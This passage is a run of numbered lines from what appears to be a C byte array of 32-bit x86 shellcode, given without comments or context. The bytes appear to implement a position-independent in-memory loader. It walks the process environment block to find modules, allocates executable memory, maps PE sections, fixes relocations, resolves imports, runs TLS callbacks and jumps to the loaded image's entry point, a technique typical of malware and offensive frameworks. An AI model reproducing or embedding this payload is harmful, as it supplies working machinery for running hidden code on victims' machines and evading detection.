482 0x50, 0x55, 0xff, 0x53, 0x74, 0x83, 0x64, 0x24, 0x4c, 0x00, 0x8d, 0x54,
483 0x24, 0x64, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x48, 0x40, 0x66, 0x89,
484 0x44, 0x24, 0x48, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10, 0x8b, 0xfc, 0x8b,
485 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94, 0x00, 0x00, 0x00,
486 0x85, 0xed, 0x0f, 0x84, 0x88, 0x01, 0x00, 0x00, 0xff, 0x74, 0x24, 0x3c,
487 0xff, 0x53, 0x78, 0x55, 0xff, 0x53, 0x78, 0xe9, 0x78, 0x01, 0x00, 0x00,
488 0x21, 0x2f, 0xe9, 0x71, 0x01, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x8c, 0x02,
489 0x00, 0x00, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x86,
490 0x0c, 0x02, 0x00, 0x00, 0x50, 0x53, 0xe8, 0x0b, 0x0a, 0x00, 0x00, 0x83,
491 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0xff, 0x93,
492 0x84, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x89, 0x6c, 0x24, 0x20, 0x85, 0xed,
493 0x0f, 0x84, 0x39, 0x01, 0x00, 0x00, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00,
494 0x00, 0x50, 0x8d, 0x86, 0x0c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xe8, 0xd7,
495 0x09, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00,
496 0x00, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24,
497 0x85, 0xc0, 0x0f, 0x84, 0xfd, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x94,
498 0x02, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52,
499 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x3c, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85,
500 0xff, 0x0f, 0x88, 0xcf, 0x00, 0x00, 0x00, 0x81, 0xc6, 0x0c, 0x04, 0x00,
501 0x00, 0x33, 0xed, 0x80, 0x3e, 0x00, 0x74, 0x7e, 0x8d, 0x84, 0x24, 0x84,
502 0x00, 0x00, 0x00, 0x50, 0x56, 0x53, 0xe8, 0x7b, 0x09, 0x00, 0x00, 0x83,
503 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x84, 0x24, 0x88, 0x00,
504 0x00, 0x00, 0x50, 0xff, 0x53, 0x68, 0xff, 0x74, 0x24, 0x14, 0x8b, 0xf0,
505 0x55, 0x6a, 0x0c, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x4a,
506 0x33, 0xc9, 0x89, 0x4c, 0x24, 0x10, 0x39, 0x4c, 0x24, 0x14, 0x76, 0x3e,
507 0xff, 0x34, 0x8e, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x6a, 0x08, 0x89,
508 0x44, 0x24, 0x60, 0x58, 0x66, 0x89, 0x44, 0x24, 0x54, 0x8d, 0x44, 0x24,
509 0x54, 0x50, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x55, 0xff, 0x53, 0x74, 0x8b,
510 0xf8, 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x78, 0x33, 0xed, 0x8b,
511 0x4c, 0x24, 0x10, 0x41, 0x89, 0x4c, 0x24, 0x10, 0x3b, 0x4c, 0x24, 0x14,
512 0x72, 0xc2, 0x85, 0xff, 0x78, 0x3c, 0x8b, 0x44, 0x24, 0x30, 0x8d, 0x54,
513 0x24, 0x74, 0x52, 0x55, 0x83, 0xec, 0x10, 0x8d, 0x74, 0x24, 0x5c, 0x8b,
514 0x00, 0x8b, 0xfc, 0x6a, 0x00, 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00,
515 0x00, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x44, 0x56, 0x50, 0xff, 0x91,
516 0xe4, 0x00, 0x00, 0x00, 0x85, 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x78,
517 0x8b, 0x6c, 0x24, 0x20, 0xeb, 0x08, 0x8b, 0x6c, 0x24, 0x20, 0x8b, 0x74,
518 0x24, 0x24, 0x56, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x55, 0xff, 0x93,
519 0x88, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81,
520 0xc4, 0x78, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0x24, 0x02, 0x00, 0x00,
521 0x53, 0x8b, 0x9c, 0x24, 0x2c, 0x02, 0x00, 0x00, 0x33, 0xc0, 0x55, 0x8b,
522 0xac, 0x24, 0x34, 0x02, 0x00, 0x00, 0x81, 0xc5, 0x28, 0x05, 0x00, 0x00,
523 0x89, 0x44, 0x24, 0x1c, 0x57, 0x50, 0x89, 0x6c, 0x24, 0x28, 0x8b, 0x7d,
524 0x3c, 0x03, 0xfd, 0x89, 0x7c, 0x24, 0x20, 0xff, 0x53, 0x38, 0x66, 0x8b,
525 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b, 0x4c,
526 0x02, 0x04, 0x0f, 0x85, 0xed, 0x03, 0x00, 0x00, 0x8b, 0x4f, 0x50, 0xb8,
527 0x00, 0x30, 0x00, 0x00, 0x56, 0x6a, 0x40, 0x50, 0x89, 0x44, 0x24, 0x1c,
528 0xb8, 0x00, 0x10, 0x00, 0x00, 0x03, 0xc8, 0x51, 0x6a, 0x00, 0xff, 0x53,
529 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xc5, 0x03, 0x00, 0x00, 0xff,
530 0x77, 0x54, 0x55, 0x56, 0xe8, 0xb5, 0x0c, 0x00, 0x00, 0x0f, 0xb7, 0x6f,
531 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x1c, 0x00, 0x83, 0xc4, 0x0c, 0x83,
532 0xc5, 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x32, 0x8b, 0x5c, 0x24, 0x10,
533 0x03, 0xef, 0xff, 0x75, 0xfc, 0x8b, 0x45, 0x00, 0x03, 0x44, 0x24, 0x2c,
534 0x50, 0x8b, 0x45, 0xf8, 0x03, 0xc6, 0x50, 0xe8, 0x82, 0x0c, 0x00, 0x00,
535 0x0f, 0xb7, 0x47, 0x06, 0x8d, 0x6d, 0x28, 0x83, 0xc4, 0x0c, 0x43, 0x3b,
536 0xd8, 0x72, 0xdb, 0x8b, 0x9c, 0x24, 0x38, 0x02, 0x00, 0x00, 0x8b, 0x87,
537 0xa0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x76, 0x8d, 0x2c, 0x30, 0x8b,
538 0xc6, 0x2b, 0x47, 0x34, 0x83, 0x7d, 0x00, 0x00, 0x89, 0x44, 0x24, 0x10,
539 0x74, 0x64, 0x8d, 0x4d, 0x08, 0xeb, 0x4b, 0x0f, 0xb7, 0x01, 0x8b, 0xd0,
540 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x18, 0x66, 0x3b, 0x44,
541 0x24, 0x14, 0x75, 0x25, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00, 0x00, 0x89,
542 0x44, 0x24, 0x18, 0x03, 0x45, 0x00, 0x8b, 0x0c, 0x30, 0x03, 0x4c, 0x24,
543 0x10, 0x8b, 0x44, 0x24, 0x18, 0x03, 0x45, 0x00, 0x89, 0x0c, 0x30, 0x8b,
544 0x4c, 0x24, 0x1c, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b,
545 0xd0, 0x0f, 0x83, 0xfe, 0x02, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x45,
546 0x04, 0x03, 0xc5, 0x89, 0x4c, 0x24, 0x1c, 0x3b, 0xc8, 0x75, 0xa8, 0x83,
547 0x39, 0x00, 0x8b, 0xe9, 0x75, 0x9c, 0x8b, 0x87, 0x80, 0x00, 0x00, 0x00,
548 0x85, 0xc0, 0x0f, 0x84, 0xa5, 0x00, 0x00, 0x00, 0x8d, 0x2c, 0x30, 0x8b,
549 0x45, 0x0c, 0x89, 0x6c, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x84, 0x93, 0x00,
550 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x03, 0xc6, 0x50,
551 0xff, 0x53, 0x30, 0x8b, 0x55, 0x10, 0x89, 0x44, 0x24, 0x1c, 0x03, 0xd6,
552 0x8b, 0x45, 0x00, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x14, 0x89, 0x44, 0x24,
553 0x18, 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x54, 0x8b, 0xea, 0x79, 0x05, 0x0f,
554 0xb7, 0xc1, 0xeb, 0x28, 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x83, 0x7f, 0x04,
555 0x00, 0x89, 0x44, 0x24, 0x14, 0x74, 0x19, 0x50, 0x53, 0xe8, 0xa8, 0xf4,
556 0xff, 0xff, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x08, 0x8b, 0x83, 0xd8, 0x00,
557 0x00, 0x00, 0xeb, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x50, 0xff, 0x74, 0x24,
558 0x20, 0xff, 0x53, 0x34, 0x89, 0x45, 0x00, 0x83, 0xc5, 0x04, 0x8b, 0x44,
559 0x24, 0x18, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24, 0x18, 0x8b, 0x08, 0x85,
560 0xc9, 0x75, 0xb2, 0x8b, 0x6c, 0x24, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xc5,
561 0x14, 0x89, 0x6c, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x85, 0x78, 0xff, 0xff,
562 0xff, 0x8b, 0x7c, 0x24, 0x20, 0x8b, 0x87, 0xe0, 0x00, 0x00, 0x00, 0x85,
563 0xc0, 0x74, 0x77, 0x8d, 0x6e, 0x04, 0x03, 0xe8, 0x89, 0x6c, 0x24, 0x1c,
564 0x8b, 0x45, 0x00, 0x85, 0xc0, 0x74, 0x67, 0x03, 0xc6, 0x50, 0xff, 0x53,
565 0x30, 0x89, 0x44, 0x24, 0x10, 0x85, 0xc0, 0x74, 0x47, 0x8b, 0x4d, 0x0c,
566 0x8b, 0x55, 0x08, 0x03, 0xce, 0x03, 0xd6, 0x89, 0x4c, 0x24, 0x14, 0x89,
567 0x54, 0x24, 0x18, 0x8b, 0x01, 0x85, 0xc0, 0x74, 0x2f, 0x8b, 0xf9, 0x8b,
568 0xea, 0x8b, 0x4b, 0x34, 0x85, 0xc0, 0x79, 0x05, 0x0f, 0xb7, 0xc0, 0xeb,
569 0x05, 0x83, 0xc0, 0x02, 0x03, 0xc6, 0x50, 0xff, 0x74, 0x24, 0x14, 0xff,
570 0xd1, 0x83, 0xc7, 0x04, 0x89, 0x45, 0x00, 0x83, 0xc5, 0x04, 0x8b, 0x07,
571 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0x6c, 0x24, 0x1c, 0x83, 0xc5, 0x20, 0x89,
572 0x6c, 0x24, 0x1c, 0x8b, 0x45, 0x00, 0x85, 0xc0, 0x75, 0x9d, 0x8b, 0x7c,
573 0x24, 0x20, 0x8b, 0xaf, 0xc0, 0x00, 0x00, 0x00, 0x85, 0xed, 0x74, 0x1b,
574 0x8b, 0x6c, 0x2e, 0x0c, 0x85, 0xed, 0x74, 0x13, 0xeb, 0x0a, 0x6a, 0x00,
575 0x6a, 0x01, 0x56, 0xff, 0xd0, 0x8d, 0x6d, 0x04, 0x8b, 0x45, 0x00, 0x85,
576 0xc0, 0x75, 0xef, 0x8b, 0x84, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x8b, 0x6f,
577 0x28, 0x03, 0xee, 0x83, 0x38, 0x03, 0x0f, 0x85, 0x0b, 0x01, 0x00, 0x00,
578 0x6a, 0x00, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd5, 0x8b, 0x94,
579 0x24, 0x3c, 0x02, 0x00, 0x00, 0x81, 0xc2, 0x0c, 0x03, 0x00, 0x00, 0x89,
580 0x54, 0x24, 0x2c, 0x80, 0x3a, 0x00, 0x0f, 0x84, 0x55, 0x01, 0x00, 0x00,
581 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0x4a, 0x01, 0x00, 0x00, 0x8b,
582 0x6c, 0x31, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x3e, 0x01, 0x00, 0x00, 0x8b,
583 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x44, 0x31,
584 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24,
585 0x14, 0x8d, 0x04, 0xa8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x20, 0x8b,
586 0x00, 0x03, 0xc6, 0x52, 0x50, 0xe8, 0x4d, 0x0a, 0x00, 0x00, 0x59, 0x59,
587 0x85, 0xc0, 0x74, 0x16, 0x8b, 0x44, 0x24, 0x20, 0x83, 0xe8, 0x04, 0x89,
588 0x44, 0x24, 0x20, 0x83, 0xed, 0x01, 0x74, 0x1c, 0x8b, 0x54, 0x24, 0x2c,
589 0xeb, 0xd9, 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x4c, 0x24, 0x10, 0x0f, 0xb7,
590 0x44, 0x68, 0xfe, 0x8b, 0x04, 0x81, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x24,
591 0xff, 0x77, 0x54, 0x6a, 0x00, 0x56, 0xe8, 0xfb, 0x09, 0x00, 0x00, 0xff,
592 0x77, 0x54, 0x6a, 0x00, 0xff, 0x74, 0x24, 0x3c, 0xe8, 0xed, 0x09, 0x00,
593 0x00, 0x8b, 0x44, 0x24, 0x3c, 0x83, 0xc4, 0x18, 0x85, 0xc0, 0x0f, 0x84,
594 0xb5, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x8d,
595 0xbd, 0x0c, 0x04, 0x00, 0x00, 0x80, 0x3f, 0x00, 0x74, 0x31, 0x8b, 0x8d,
596 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc9, 0x74, 0x15, 0x8d, 0x44, 0x24, 0x30,
597 0x50, 0x57, 0x53, 0xe8, 0x0a, 0x05, 0x00, 0x00, 0x8b, 0x8d, 0x0c, 0x05,
598 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x85, 0xc9, 0x8d, 0x44, 0x24, 0x30, 0x0f,
599 0x44, 0xc7, 0x50, 0x8b, 0x44, 0x24, 0x28, 0xff, 0xd0, 0xeb, 0x72, 0xff,
600 0xd0, 0xeb, 0x6e, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x80, 0x38, 0x00, 0x74,
601 0x1a, 0x8d, 0x4c, 0x24, 0x30, 0x51, 0x50, 0x53, 0xe8, 0xd5, 0x04, 0x00,
602 0x00, 0x8d, 0x44, 0x24, 0x3c, 0x50, 0x53, 0xe8, 0x26, 0x02, 0x00, 0x00,
603 0x83, 0xc4, 0x14, 0xff, 0x77, 0x54, 0x6a, 0x00, 0x56, 0xe8, 0x68, 0x09,
604 0x00, 0x00, 0xff, 0x77, 0x54, 0x6a, 0x00, 0xff, 0x74, 0x24, 0x3c, 0xe8,
605 0x5a, 0x09, 0x00, 0x00, 0x8b, 0x84, 0x24, 0x54, 0x02, 0x00, 0x00, 0x33,
606 0xc9, 0x83, 0xc4, 0x18, 0x39, 0x48, 0x04, 0x74, 0x15, 0x51, 0x51, 0x51,
607 0x55, 0x51, 0x51, 0xff, 0x53, 0x5c, 0x85, 0xc0, 0x74, 0x13, 0x6a, 0xff,
608 0x50, 0xff, 0x53, 0x58, 0xeb, 0x0b, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00,
609 0xff, 0x70, 0x30, 0xff, 0xd5, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00,
610 0x56, 0xff, 0x53, 0x40, 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0x24, 0x02,
611 0x00, 0x00, 0xc3, 0x81, 0xec, 0xf4, 0x02, 0x00, 0x00, 0x53, 0x8b, 0x9c,
612 0x24, 0xfc, 0x02, 0x00, 0x00, 0x55, 0x56, 0x6a, 0x04, 0x8b, 0x83, 0x18,
613 0x09, 0x00, 0x00, 0x33, 0xf6, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x04,
614 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x56, 0xff, 0x53, 0x3c, 0x8b, 0xe8,
615 0x85, 0xed, 0x0f, 0x84, 0x84, 0x01, 0x00, 0x00, 0x8b, 0x84, 0x24, 0x08,
616 0x03, 0x00, 0x00, 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x05, 0x28, 0x05,
617 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x50, 0x56, 0x56, 0xff,
618 0x53, 0x50, 0x8d, 0x44, 0x24, 0x58, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44,
619 0x24, 0x14, 0x50, 0x53, 0xe8, 0x9f, 0xe5, 0xff, 0xff, 0x8d, 0x44, 0x24,
620 0x4c, 0x89, 0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8,
621 0x42, 0xe4, 0xff, 0xff, 0x8d, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x89,
622 0x44, 0x24, 0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0x3d, 0xee,
623 0xff, 0xff, 0x83, 0xc4, 0x18, 0x56, 0x56, 0xff, 0x93, 0xbc, 0x00, 0x00,
624 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
625 0x0c, 0x50, 0x8d, 0x83, 0x94, 0x06, 0x00, 0x00, 0x50, 0x6a, 0x03, 0x56,
626 0x8d, 0x83, 0x74, 0x06, 0x00, 0x00, 0x50, 0xff, 0x93, 0xc0, 0x00, 0x00,
627 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x4c, 0x24,
628 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0xc4, 0x06, 0x00, 0x00,
629 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x0f, 0x85, 0xa0, 0x00,
630 0x00, 0x00, 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c,
631 0x85, 0xc0, 0x0f, 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x0c,
632 0x8d, 0x54, 0x24, 0x14, 0x89, 0x4c, 0x24, 0x34, 0x52, 0x51, 0x8b, 0x01,
633 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75, 0x6d, 0x57, 0x8d, 0x84, 0x24, 0x00,
634 0x01, 0x00, 0x00, 0x50, 0x8d, 0x83, 0xe0, 0x05, 0x00, 0x00, 0x50, 0x53,
635 0xe8, 0x45, 0x03, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x00,
636 0x01, 0x00, 0x00, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x4c,
637 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff, 0x52,
638 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x5f, 0x85,
639 0xf6, 0x75, 0x27, 0x8b, 0x44, 0x24, 0x10, 0x33, 0xf6, 0x56, 0x56, 0x56,
640 0x8b, 0x08, 0x56, 0x56, 0x56, 0x56, 0x56, 0x55, 0x50, 0xff, 0x51, 0x14,
641 0x85, 0xc0, 0x75, 0x10, 0x8b, 0x44, 0x24, 0x0c, 0x6a, 0x02, 0x50, 0x8b,
642 0x08, 0xff, 0x51, 0x14, 0xeb, 0x02, 0x33, 0xf6, 0x8b, 0x44, 0x24, 0x10,
643 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x8b,
644 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x8b, 0x08, 0xff,
645 0x51, 0x08, 0x8b, 0x83, 0x18, 0x09, 0x00, 0x00, 0x8d, 0x04, 0x45, 0x02,
646 0x00, 0x00, 0x00, 0x50, 0x56, 0x55, 0xe8, 0x67, 0x07, 0x00, 0x00, 0x83,
647 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x56, 0x55, 0xff, 0x53, 0x40,
648 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xf4, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec,
649 0x9c, 0x00, 0x00, 0x00, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00, 0x53, 0x55,
650 0x56, 0x8b, 0x40, 0x30, 0x57, 0x8b, 0xbc, 0x24, 0xb0, 0x00, 0x00, 0x00,
651 0x89, 0x44, 0x24, 0x14, 0x8b, 0x40, 0x10, 0x89, 0x44, 0x24, 0x18, 0x8d,
652 0x87, 0x4c, 0x03, 0x00, 0x00, 0x50, 0xff, 0x57, 0x38, 0x8b, 0xd8, 0x33,
653 0xc0, 0x8b, 0x53, 0x3c, 0x03, 0xd3, 0x0f, 0xb7, 0x6a, 0x14, 0x03, 0xea,
654 0x0f, 0xb7, 0x52, 0x06, 0x8d, 0x4d, 0x18, 0x85, 0xd2, 0x74, 0x12, 0x8b,
655 0xb7, 0x44, 0x03, 0x00, 0x00, 0x39, 0x31, 0x74, 0x6e, 0x40, 0x83, 0xc1,
656 0x28, 0x3b, 0xc2, 0x72, 0xf4, 0x8b, 0x5c, 0x24, 0x1c, 0x8b, 0x74, 0x24,
657 0x1c, 0x83, 0x64, 0x24, 0x10, 0x00, 0x85, 0xdb, 0x74, 0x48, 0x8b, 0xee,
658 0xc7, 0x44, 0x24, 0x28, 0x01, 0x00, 0x00, 0x00, 0x89, 0x6c, 0x24, 0x1c,
659 0xff, 0x75, 0x04, 0x57, 0xe8, 0x2e, 0xf0, 0xff, 0xff, 0x59, 0x59, 0x85,
660 0xc0, 0x74, 0x17, 0x8b, 0x44, 0x24, 0x18, 0x33, 0xc9, 0x41, 0x83, 0xc0,
661 0x40, 0x51, 0x55, 0x50, 0xff, 0x97, 0xc8, 0x00, 0x00, 0x00, 0x85, 0xc0,
662 0x75, 0x33, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc5, 0x04, 0x40, 0x89, 0x6c,
663 0x24, 0x1c, 0x89, 0x44, 0x24, 0x10, 0x3b, 0xc3, 0x72, 0xc6, 0x33, 0xc0,
664 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x9c, 0x00, 0x00, 0x00, 0xc3, 0x6b,
665 0xc0, 0x28, 0x8b, 0x74, 0x28, 0x24, 0x03, 0xf3, 0x8b, 0x5c, 0x28, 0x20,
666 0xc1, 0xeb, 0x02, 0xeb, 0x90, 0x33, 0xc0, 0x40, 0x50, 0x8b, 0x44, 0x24,
667 0x1c, 0x83, 0xc0, 0x40, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xff, 0x97,
668 0xd0, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0xb4, 0x00, 0x00, 0x00, 0x55,
669 0xff, 0x97, 0xe0, 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x10, 0x00, 0xff,
670 0x76, 0x04, 0x57, 0xe8, 0xab, 0xef, 0xff, 0xff, 0x59, 0x59, 0x85, 0xc0,
671 0x74, 0x14, 0x33, 0xc0, 0x40, 0x50, 0x56, 0x8d, 0x44, 0x24, 0x28, 0x50,
672 0xff, 0x97, 0xcc, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x44,
673 0x24, 0x10, 0x83, 0xc6, 0x04, 0x40, 0x89, 0x44, 0x24, 0x10, 0x3b, 0xc3,
674 0x72, 0xcd, 0xeb, 0x20, 0x33, 0xc0, 0x40, 0x50, 0x55, 0x8d, 0x44, 0x24,
675 0x28, 0x50, 0xff, 0x97, 0xd0, 0x00, 0x00, 0x00, 0x6a, 0x08, 0x8d, 0x44,
676 0x24, 0x24, 0x50, 0x56, 0xe8, 0xdd, 0x05, 0x00, 0x00, 0x83, 0xc4, 0x0c,
677 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x40, 0x0c, 0x8b, 0x58, 0x0c, 0x83, 0x7b,
678 0x18, 0x00, 0x0f, 0x84, 0x14, 0x01, 0x00, 0x00, 0x8d, 0x87, 0x6c, 0x03,
679 0x00, 0x00, 0x8b, 0xc8, 0x89, 0x44, 0x24, 0x14, 0x8a, 0x11, 0x33, 0xc0,
680 0x40, 0x33, 0xf6, 0x89, 0x44, 0x24, 0x18, 0x33, 0xc0, 0x84, 0xd2, 0x0f,
681 0x84, 0xe1, 0x00, 0x00, 0x00, 0x8d, 0x7c, 0x24, 0x2c, 0x8b, 0xe9, 0x2b,
682 0xf9, 0x89, 0x7c, 0x24, 0x10, 0x8b, 0x7c, 0x24, 0x18, 0x8b, 0x4c, 0x24,
683 0x10, 0x89, 0x7c, 0x24, 0x10, 0x80, 0xfa, 0x3b, 0x74, 0x29, 0x3d, 0x80,
684 0x00, 0x00, 0x00, 0x73, 0x22, 0x33, 0xff, 0x88, 0x14, 0x29, 0x80, 0xfa,
685 0x77, 0x0f, 0x45, 0x7c, 0x24, 0x10, 0x80, 0xfa, 0x70, 0x89, 0x7c, 0x24,
686 0x18, 0x0f, 0x44, 0x74, 0x24, 0x28, 0x40, 0x45, 0x8a, 0x55, 0x00, 0x84,
687 0xd2, 0x75, 0xce, 0x8b, 0xbc, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x6c,
688 0x24, 0x1c, 0x8b, 0x4c, 0x24, 0x14, 0x89, 0x74, 0x24, 0x10, 0x85, 0xc0,
689 0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, 0x41, 0xc6, 0x44, 0x04, 0x2c, 0x00,
690 0x03, 0xc8, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0xff, 0x73, 0x18, 0x89, 0x4c,
691 0x24, 0x1c, 0xff, 0x57, 0x34, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0xf0, 0x85,
692 0xf6, 0x0f, 0x84, 0x65, 0xff, 0xff, 0xff, 0x83, 0x7c, 0x24, 0x18, 0x00,
693 0x74, 0x26, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x04, 0xff, 0xd6, 0x8b,
694 0xf0, 0x8b, 0x4c, 0x24, 0x14, 0x85, 0xf6, 0x0f, 0x84, 0x47, 0xff, 0xff,
695 0xff, 0x83, 0x3e, 0x00, 0x0f, 0x84, 0x3e, 0xff, 0xff, 0xff, 0x8b, 0x44,
696 0x24, 0x24, 0xeb, 0x23, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x04, 0xff,
697 0xd6, 0x8b, 0xf0, 0x8b, 0x4c, 0x24, 0x14, 0x85, 0xf6, 0x0f, 0x84, 0x21,
698 0xff, 0xff, 0xff, 0x83, 0x3e, 0x00, 0x0f, 0x84, 0x18, 0xff, 0xff, 0xff,
699 0x8b, 0x45, 0x04, 0x8b, 0x4c, 0x24, 0x14, 0x89, 0x06, 0xe9, 0x0a, 0xff,
700 0xff, 0xff, 0x8b, 0x1b, 0x8d, 0x87, 0x6c, 0x03, 0x00, 0x00, 0x83, 0x7b,
701 0x18, 0x00, 0x0f, 0x85, 0xf2, 0xfe, 0xff, 0xff, 0x33, 0xc0, 0x40, 0xe9,
702 0x34, 0xfe, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00,
703 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b,
704 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24,
705 0x08, 0xc3, 0x8b, 0x44, 0x24, 0x04, 0x68, 0x00, 0x01, 0x00, 0x00, 0xff,
706 0x74, 0x24, 0x10, 0x6a, 0xff, 0xff, 0x74, 0x24, 0x14, 0x6a, 0x00, 0x6a,
707 0x00, 0xff, 0x50, 0x50, 0xc3, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x58, 0x83,
708 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00,
709 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x30, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c,
